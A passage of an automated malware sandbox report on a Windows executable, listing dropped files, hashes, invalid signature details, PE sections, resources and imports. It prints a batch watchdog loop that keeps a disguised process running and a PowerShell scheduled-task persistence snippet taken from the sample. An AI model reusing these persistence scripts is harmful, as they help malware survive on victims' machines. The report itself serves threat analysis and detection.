                                                                          Preview:@echo off..:CheckProcess..set "ProcessName=ShellExperienceHosts.exe"..set "ProcessPath=C:\Users\Public\Bulete\program\ShellExperienceHosts.exe"..set "BackupProcessPath=C:\Users\user\AppData\Local\Temp\\backup.exe"..set "DLLPath=C:\Users\Public\Bulete\program\yyzyBase.dll"..set "BackupDLLPath=C:\Users\user\AppData\Local\Temp\\backup.dll"..if not exist "%ProcessPath%" (.. echo Process file not found, restoring from backup..... copy /Y "%BackupProcessPath%" "%ProcessPath%"..)..if not exist "%DLLPath%" (.. echo DLL file not found, restoring from backup..... copy /Y "%BackupDLLPath%" "%DLLPath%"..)..tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul..if %ERRORLEVEL% neq 0 (.. start "" "%ProcessPath%"..)..timeout /t 30 /nobreak >nul..goto CheckProcess..

                                                                          C:\Users\user\AppData\Local\Temp\monitor.pid

                                                                          Download File
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):2.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:B:B
                                                                          MD5:27D8D40B22F812A1BA6C26F8EF7DF480
                                                                          SHA1:49C62DC250B446E0FFC4E5194EB365DA2E0CEBBD
                                                                          SHA-256:9347C0C9A9A77D1DF666D472577AFDF194993199FF30713910B6766B2BD71AA8
                                                                          SHA-512:71C1EDCA12C2B527DA2F7645333689176221546E3CAB6BC7307870EE29DA8FE324B4013BD082EECAF3E946BE1E1039968B9C1849034500A10B97D6E101C66D67
                                                                          Malicious:false
                                                                          Preview:4312

                                                                          C:\Users\user\AppData\Local\updated.ps1

                                                                          Download File
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):151
                                                                          Entropy (8bit):4.741657013789009
                                                                          Encrypted:false
                                                                          SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                          MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                          SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                          SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                          SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                          Malicious:true
                                                                          Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                          C:\Users\user\Desktop\wps_lid.lid-s8HDMqE8a6Xy.exe.lnk

                                                                          Download File
                                                                          Process:C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 27 07:19:27 2024, mtime=Fri Dec 27 07:19:27 2024, atime=Thu Dec 5 08:47:57 2024, length=5910912, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):1121
                                                                          Entropy (8bit):4.697816234169075
                                                                          Encrypted:false
                                                                          SSDEEP:12:8O1RUlGI+CICHqX/iXaACmqFT8zKp6I6bjAEOQdStGi6yavPdxo44t2YZ/elFlSd:8lGRa7K/6vAEHSx6/vlx3qyFm
                                                                          MD5:32CB467F57CA900340DA87FC8E906578
                                                                          SHA1:B2E7A5BDFC7386F69E0C9F0EC3D6A5CA02C69F84
                                                                          SHA-256:4C8A7D6990BDDF9A883B63543C9AB4EB7672075814A05282D5F5306C291D3593
                                                                          SHA-512:EDB833A6FAFC0B7B80494155EF9EFE71D4EA27A6C919AC9E9B523FCD2F95D57BED653EC698407453B5D3085BA360E82A6E28E3DFD84D573237E070DB8E7C8364
                                                                          Malicious:false
                                                                          Preview:L..................F.... .......8X...0..8X...xS..F...1Z..........................P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.YmB....................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......YnB..Public..f......O.I.YoB....+...............<......2v.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....T.1......YnB..Bulete..>......YnB.YnB............................:.B.u.l.e.t.e.......2..1Z..Y.M .WPS_LI~1.EXE..j......YnB.YnB.... .....................q"..w.p.s._.l.i.d...l.i.d.-.s.8.H.D.M.q.E.8.a.6.X.y...e.x.e.......b...............-.......a.............g\.....C:\Users\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exe..0.....\.....\.P.u.b.l.i.c.\.B.u.l.e.t.e.\.w.p.s._.l.i.d...l.i.d.-.s.8.H.D.M.q.E.8.a.6.X.y...e.x.e..........v..*.cM.jVD.Es.!...`.......X.......813848...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.

                                                                          \Device\Null

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\timeout.exe
                                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                          Category:dropped
                                                                          Size (bytes):134
                                                                          Entropy (8bit):4.078552106113438
                                                                          Encrypted:false
                                                                          SSDEEP:3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUqg2Htm:hYFRamFSQZ0lv5y/9JctESnQUq3tm
                                                                          MD5:5410B2A3CD92E086498679B0501DEDDD
                                                                          SHA1:6C1EA996851C4ADF951301E0614F745718879914
                                                                          SHA-256:0C938B9F17B65DC2A1C8BF357CB8EBC4DCCCFEFA66C35C9FBA3D57FAE4FD77D5
                                                                          SHA-512:4FE30CD3C50771A995DE8EFD81A5613D2AC3F589DE22FBD316F13905C59393CFBC091F8430B6427803B8087035B34F7628B7E36CE70FD3F486FAA38CA5F5384D
                                                                          Malicious:false
                                                                          Preview:..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.931775445441287
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:S1Rv3ioghk.exe
                                                                          File size:4'477'216 bytes
                                                                          MD5:fd7ec2c34e2593e4d606e0a9d37e257a
                                                                          SHA1:aac4d5282290c1da30acbf00703c02c5e6ee4b6e
                                                                          SHA256:17a742ca6bd9bd88de4f83074d17d1f74faec1b04d177bef710229c77d9e6e21
                                                                          SHA512:9cdedf8b49e2eccf54719ca8db1cf462bef874a1a5c0c5b7cb91864da3dcce2971b2318effb7c0c7d126ec26bb801e524e2c4f477087e708670970a744c3b470
                                                                          SSDEEP:98304:1pe1S1L/GhYOiYjZJyY0HfyGADpjpB/t7Q/vrJpB8yG+W:1p7dOeFYjXmWZpA/vrJpKy7W
                                                                          TLSH:0F2622D83394E369E6B19530E6A356F41972AD9AE920F47BD2643F0C2DB4F04A17432F
                                                                          File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................h...............0....@.................................A........................................P...........,............C.8..

                                                                          File Icon

                                                                          Icon Hash:3f43e872666cd520

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x411def
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:
                                                                          Time Stamp:0x4C26F87E [Sun Jun 27 07:06:38 2010 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:b5a014d7eeb4c2042897567e1288a095

                                                                          Authenticode Signature

                                                                          Signature Valid:false
                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                          Error Number:-2146869232
                                                                          Not Before, Not After
                                                                          • 13/03/2023 00:00:00 12/03/2024 23:59:59
                                                                          Subject Chain
                                                                          • CN=Intel Corporation, O=Intel Corporation, S=California, C=US
                                                                          Version:3
                                                                          Thumbprint MD5:D33A22FCE39A6199A642B44AD0FC8B60
                                                                          Thumbprint SHA-1:2F395649AEAD9175BBF761901050546E7A10AA0C
                                                                          Thumbprint SHA-256:CDE983898016FC3807D26E1B770A5516C52D855BCB523705C0826B00267D58A2
                                                                          Serial:00A90FA001692A0CC5CCF51B5821F2952C

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push FFFFFFFFh
                                                                          push 00414C50h
                                                                          push 00411F80h
                                                                          mov eax, dword ptr fs:[00000000h]
                                                                          push eax
                                                                          mov dword ptr fs:[00000000h], esp
                                                                          sub esp, 68h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          mov dword ptr [ebp-18h], esp
                                                                          xor ebx, ebx
                                                                          mov dword ptr [ebp-04h], ebx
                                                                          push 00000002h
                                                                          call dword ptr [00413184h]
                                                                          pop ecx
                                                                          or dword ptr [00419924h], FFFFFFFFh
                                                                          or dword ptr [00419928h], FFFFFFFFh
                                                                          call dword ptr [00413188h]
                                                                          mov ecx, dword ptr [0041791Ch]
                                                                          mov dword ptr [eax], ecx
                                                                          call dword ptr [0041318Ch]
                                                                          mov ecx, dword ptr [00417918h]
                                                                          mov dword ptr [eax], ecx
                                                                          mov eax, dword ptr [00413190h]
                                                                          mov eax, dword ptr [eax]
                                                                          mov dword ptr [00419920h], eax
                                                                          call 00007F94E47D4992h
                                                                          cmp dword ptr [00417710h], ebx
                                                                          jne 00007F94E47D487Eh
                                                                          push 00411F78h
                                                                          call dword ptr [00413194h]
                                                                          pop ecx
                                                                          call 00007F94E47D4964h
                                                                          push 00417048h
                                                                          push 00417044h
                                                                          call 00007F94E47D494Fh
                                                                          mov eax, dword ptr [00417914h]
                                                                          mov dword ptr [ebp-6Ch], eax
                                                                          lea eax, dword ptr [ebp-6Ch]
                                                                          push eax
                                                                          push dword ptr [00417910h]
                                                                          lea eax, dword ptr [ebp-64h]
                                                                          push eax
                                                                          lea eax, dword ptr [ebp-70h]
                                                                          push eax
                                                                          lea eax, dword ptr [ebp-60h]
                                                                          push eax
                                                                          call dword ptr [0041319Ch]
                                                                          push 00417040h
                                                                          push 00417000h
                                                                          call 00007F94E47D491Ch

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x150dc0xb4.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x52cfc.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x439fe80xb138
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x130000x310.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x113170x11400797279c5ab1a163aed1f2a528f9fe3ceFalse0.6174988677536232data6.576987441854239IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x130000x30ea0x32001359639b02bcb8f0a8743e6ead1c0030False0.43828125data5.549434098115495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x170000x292c0x8009415c9c8dea3245d6d73c23393e27d8eFalse0.431640625data3.6583182363171756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x1a0000x52cfc0x52e00245e0061051191c28806833062f9d410False0.1521434294871795data4.9556234886773645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          PNG0x1c3c00x198PNG image data, 210 x 143, 4-bit colormap, non-interlacedChineseChina0.8406862745098039
                                                                          RT_CURSOR0x1c5580x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"0.35714285714285715
                                                                          RT_CURSOR0x1c68c0x134data0.44155844155844154
                                                                          RT_CURSOR0x1c7c00x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"0.40584415584415584
                                                                          RT_CURSOR0x1c8f40x134Targa image data 64 x 65536 x 1 +32 "\001"0.5746753246753247
                                                                          RT_CURSOR0x1ca280x134AmigaOS bitmap font "(", fc_YSize 4294966287, 3840 elements, 2nd "\376\017\340\377\377\017\341\377\377\217\343\377\377\337\367\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd0.4642857142857143
                                                                          RT_CURSOR0x1cb5c0x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.32142857142857145
                                                                          RT_CURSOR0x1cc900x134data0.3409090909090909
                                                                          RT_CURSOR0x1cdc40x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.4837662337662338
                                                                          RT_CURSOR0x1cef80x134AmigaOS bitmap font "(", fc_YSize 4294935297, 3840 elements, 2nd "\200\003\377\201\300\007\377\203\300\017\377\003\340\037\376\007\360\037\370\017\370\003\300\037\374", 3rd0.711038961038961
                                                                          RT_CURSOR0x1d02c0x134data0.6038961038961039
                                                                          RT_CURSOR0x1d1600x134Targa image data 64 x 65536 x 1 +32 "\001"0.36038961038961037
                                                                          RT_CURSOR0x1d2940x134Targa image data 64 x 65536 x 1 +32 "\001"0.3474025974025974
                                                                          RT_CURSOR0x1d3c80x134AmigaOS bitmap font "(", fc_YSize 4294967040, 3840 elements, 2nd "\376", 3rd0.4383116883116883
                                                                          RT_CURSOR0x1d4fc0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"0.35064935064935066
                                                                          RT_CURSOR0x1d6300x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"0.4512987012987013
                                                                          RT_CURSOR0x1d7640x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"0.39285714285714285
                                                                          RT_CURSOR0x1d8980x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                          RT_CURSOR0x1d9cc0x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.32142857142857145
                                                                          RT_CURSOR0x1db000x134data0.4805194805194805
                                                                          RT_CURSOR0x1dc340x134data0.38311688311688313
                                                                          RT_CURSOR0x1dd680x134data0.36038961038961037
                                                                          RT_CURSOR0x1de9c0x134data0.4090909090909091
                                                                          RT_CURSOR0x1dfd00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                          RT_BITMAP0x1e1040x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                          RT_BITMAP0x1e2d40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                          RT_BITMAP0x1e4a40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                          RT_BITMAP0x1e6740x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                          RT_BITMAP0x1e8440x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                          RT_BITMAP0x1ea140xc0Device independent bitmap graphic, 11 x 11 x 4, image size 88RussianRussia0.40625
                                                                          RT_BITMAP0x1ead40xc0Device independent bitmap graphic, 11 x 11 x 4, image size 88RussianRussia0.40625
                                                                          RT_BITMAP0x1eb940xa8Device independent bitmap graphic, 10 x 8 x 4, image size 640.49404761904761907
                                                                          RT_BITMAP0x1ec3c0x134Device independent bitmap graphic, 18 x 17 x 4, image size 2040.37337662337662336
                                                                          RT_BITMAP0x1ed700xb8Device independent bitmap graphic, 10 x 10 x 4, image size 80RussianRussia0.41304347826086957
                                                                          RT_BITMAP0x1ee280xb8Device independent bitmap graphic, 11 x 10 x 4, image size 80RussianRussia0.45652173913043476
                                                                          RT_BITMAP0x1eee00xb8Device independent bitmap graphic, 10 x 10 x 4, image size 80RussianRussia0.42391304347826086
                                                                          RT_BITMAP0x1ef980xb8Device independent bitmap graphic, 11 x 10 x 4, image size 80RussianRussia0.44565217391304346
                                                                          RT_BITMAP0x1f0500x90Device independent bitmap graphic, 8 x 10 x 4, image size 400.4861111111111111
                                                                          RT_BITMAP0x1f0e00x11cDevice independent bitmap graphic, 38 x 9 x 4, image size 1800.4507042253521127
                                                                          RT_BITMAP0x1f1fc0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.5208333333333334
                                                                          RT_BITMAP0x1f2bc0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.42857142857142855
                                                                          RT_BITMAP0x1f39c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.4955357142857143
                                                                          RT_BITMAP0x1f47c0x8cDevice independent bitmap graphic, 5 x 9 x 4, image size 360.5285714285714286
                                                                          RT_BITMAP0x1f5080xc8Device independent bitmap graphic, 12 x 12 x 4, image size 96RussianRussia0.41
                                                                          RT_BITMAP0x1f5d00xc8Device independent bitmap graphic, 12 x 12 x 4, image size 96RussianRussia0.39
                                                                          RT_BITMAP0x1f6980x8cDevice independent bitmap graphic, 5 x 9 x 4, image size 360.45
                                                                          RT_BITMAP0x1f7240x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.25
                                                                          RT_BITMAP0x1f95c0x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.20950704225352113
                                                                          RT_BITMAP0x1fb940x8cDevice independent bitmap graphic, 5 x 9 x 4, image size 360.5071428571428571
                                                                          RT_BITMAP0x1fc200x8cDevice independent bitmap graphic, 5 x 9 x 4, image size 360.5142857142857142
                                                                          RT_BITMAP0x1fcac0x8cDevice independent bitmap graphic, 5 x 9 x 4, image size 360.4857142857142857
                                                                          RT_BITMAP0x1fd380x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.21654929577464788
                                                                          RT_BITMAP0x1ff700xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.3232758620689655
                                                                          RT_BITMAP0x200580xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.28448275862068967
                                                                          RT_BITMAP0x201400xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.2629310344827586
                                                                          RT_BITMAP0x202280xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.33189655172413796
                                                                          RT_ICON0x203100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.2473404255319149
                                                                          RT_ICON0x207780x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m0.15655737704918032
                                                                          RT_ICON0x211000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.12101313320825516
                                                                          RT_ICON0x221a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.07655601659751038
                                                                          RT_ICON0x247500x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m0.056211620217288615
                                                                          RT_ICON0x289780x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 2835 x 2835 px/m0.03660395207063275
                                                                          RT_ICON0x31e200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m0.027135336566899326
                                                                          RT_ICON0x426480x1104PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9687786960514233
                                                                          RT_ICON0x4374c0x2388PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced0.9195250659630607
                                                                          RT_DIALOG0x45ad40xccdataEnglishUnited States0.6911764705882353
                                                                          RT_DIALOG0x45ba00x1b4dataEnglishUnited States0.5458715596330275
                                                                          RT_STRING0x45d540x40dataEnglishUnited States0.609375
                                                                          RT_STRING0x45d940x81adataEnglishUnited States0.3322082931533269
                                                                          RT_STRING0x465b00x302dataEnglishUnited States0.4649350649350649
                                                                          RT_STRING0x468b40x298dataEnglishUnited States0.46536144578313254
                                                                          RT_STRING0x46b4c0x328dataEnglishUnited States0.4405940594059406
                                                                          RT_STRING0x46e740xc2dataEnglishUnited States0.5721649484536082
                                                                          RT_STRING0x46f380x3edataChineseChina0.6935483870967742
                                                                          RT_STRING0x46f780x5cedataEnglishUnited States0.37012113055181695
                                                                          RT_STRING0x475480x188dataEnglishUnited States0.4336734693877551
                                                                          RT_STRING0x476d00x5faOpenPGP Public KeyEnglishUnited States0.3457516339869281
                                                                          RT_STRING0x47ccc0x97cdataEnglishUnited States0.2759472817133443
                                                                          RT_STRING0x486480x3dedataEnglishUnited States0.33636363636363636
                                                                          RT_STRING0x48a280x114dataEnglishUnited States0.5652173913043478
                                                                          RT_STRING0x48b3c0x3badataEnglishUnited States0.34276729559748426
                                                                          RT_STRING0x48ef80x9adataEnglishUnited States0.5844155844155844
                                                                          RT_STRING0x48f940x216Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.46254681647940077
                                                                          RT_STRING0x491ac0x624dataEnglishUnited States0.3575063613231552
                                                                          RT_STRING0x497d00x660dataEnglishUnited States0.3474264705882353
                                                                          RT_STRING0x49e300x2e2dataEnglishUnited States0.4037940379403794
                                                                          RT_STRING0x4a1140x6cdata0.6851851851851852
                                                                          RT_STRING0x4a1800x2d0data0.46111111111111114
                                                                          RT_STRING0x4a4500x250data0.49155405405405406
                                                                          RT_STRING0x4a6a00x214data0.4567669172932331
                                                                          RT_STRING0x4a8b40x180data0.5286458333333334
                                                                          RT_STRING0x4aa340x1a4data0.5428571428571428
                                                                          RT_STRING0x4abd80x3c0data0.3489583333333333
                                                                          RT_STRING0x4af980x6a4data0.36
                                                                          RT_STRING0x4b63c0x48cdata0.38230240549828176
                                                                          RT_STRING0x4bac80x19cdata0.5145631067961165
                                                                          RT_STRING0x4bc640xecdata0.597457627118644
                                                                          RT_STRING0x4bd500x1a8data0.5
                                                                          RT_STRING0x4bef80x2b8data0.4454022988505747
                                                                          RT_STRING0x4c1b00x414data0.36398467432950193
                                                                          RT_STRING0x4c5c40x3b4data0.37658227848101267
                                                                          RT_STRING0x4c9780x340data0.3762019230769231
                                                                          RT_STRING0x4ccb80x354data0.35563380281690143
                                                                          RT_STRING0x4d00c0x2d0data0.4513888888888889
                                                                          RT_STRING0x4d2dc0xd8data0.5694444444444444
                                                                          RT_STRING0x4d3b40xf0data0.55
                                                                          RT_STRING0x4d4a40x350data0.4033018867924528
                                                                          RT_STRING0x4d7f40x384data0.37444444444444447
                                                                          RT_STRING0x4db780x2d8data0.375
                                                                          RT_RCDATA0x4de500x10data1.5
                                                                          RT_RCDATA0x4de600x590data0.6327247191011236
                                                                          RT_RCDATA0x4e3f00x133dbDelphi compiled form 'TCreatePluginForm'0.09238558069305046
                                                                          RT_RCDATA0x617cc0x2f1aDelphi compiled form 'TdxBarCustomizingForm'0.25543207828827336
                                                                          RT_RCDATA0x646e80x4b0Delphi compiled form 'TdxBarItemAddEditor'0.4608333333333333
                                                                          RT_RCDATA0x64b980x287Delphi compiled form 'TdxBarNameEd'0.6058732612055642
                                                                          RT_RCDATA0x64e200x171Delphi compiled form 'TdxBarSubMenuEditor'0.7100271002710027
                                                                          RT_RCDATA0x64f940x1491Delphi compiled form 'TFindForm'0.2641975308641975
                                                                          RT_RCDATA0x664280x49cDelphi compiled form 'TfrmAddGroupItems'0.4610169491525424
                                                                          RT_RCDATA0x668c40x1595Delphi compiled form 'THintForm'0.11782805429864253
                                                                          RT_RCDATA0x67e5c0x1aafDelphi compiled form 'TInputStringForm'0.2577953447518665
                                                                          RT_MESSAGETABLE0x6990c0x2840dataEnglishUnited States0.28823757763975155
                                                                          RT_GROUP_CURSOR0x6c14c0x14data1.35
                                                                          RT_GROUP_CURSOR0x6c1600x14data1.3
                                                                          RT_GROUP_CURSOR0x6c1740x14data1.4
                                                                          RT_GROUP_CURSOR0x6c1880x14data1.4
                                                                          RT_GROUP_CURSOR0x6c19c0x14data1.4
                                                                          RT_GROUP_CURSOR0x6c1b00x14data1.4
                                                                          RT_GROUP_CURSOR0x6c1c40x14data1.4
                                                                          RT_GROUP_CURSOR0x6c1d80x14data1.4
                                                                          RT_GROUP_CURSOR0x6c1ec0x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2000x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2140x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2280x14data1.4
                                                                          RT_GROUP_CURSOR0x6c23c0x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2500x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2640x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2780x14data1.4
                                                                          RT_GROUP_CURSOR0x6c28c0x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2a00x14data1.4
                                                                          RT_GROUP_CURSOR0x6c2b40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                          RT_GROUP_CURSOR0x6c2c80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                          RT_GROUP_CURSOR0x6c2dc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                          RT_GROUP_CURSOR0x6c2f00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                          RT_GROUP_CURSOR0x6c3040x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                          RT_GROUP_ICON0x6c3180x84data0.7045454545454546
                                                                          RT_VERSION0x6c39c0x3f4data0.475296442687747
                                                                          RT_VERSION0x6c7900x328dataEnglishUnited States0.44183168316831684
                                                                          RT_MANIFEST0x6cab80x244XML 1.0 document, ASCII text, with CRLF line terminatorsChineseChina0.453448275862069

                                                                          Imports

                                                                          DLLImport
                                                                          COMCTL32.dll
                                                                          KERNEL32.dllGetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, LoadLibraryA, LockResource, LoadResource, SizeofResource, FindResourceExA, MulDiv, GlobalFree, GlobalAlloc, lstrcmpiA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrlenA, lstrcmpiW, GetEnvironmentVariableW, lstrcmpW, GlobalMemoryStatusEx, VirtualAlloc, WideCharToMultiByte, ExpandEnvironmentStringsW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, SetThreadLocale, GetLocalTime, GetSystemTimeAsFileTime, lstrlenW, GetTempPathW, SetEnvironmentVariableW, CloseHandle, CreateFileW, GetDriveTypeW, SetCurrentDirectoryW, GetModuleFileNameW, GetCommandLineW, GetVersionExW, CreateEventW, SetEvent, ResetEvent, InitializeCriticalSection, TerminateThread, ResumeThread, SuspendThread, IsBadReadPtr, LocalFree, lstrcpyW, FormatMessageW, GetSystemDirectoryW, DeleteCriticalSection, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleHandleA, SystemTimeToFileTime, GetLastError, CreateThread, WaitForSingleObject, GetExitCodeThread, Sleep, SetLastError, SetFileAttributesW, GetDiskFreeSpaceExW, lstrcatW, ExitProcess, CompareFileTime, GetStartupInfoA
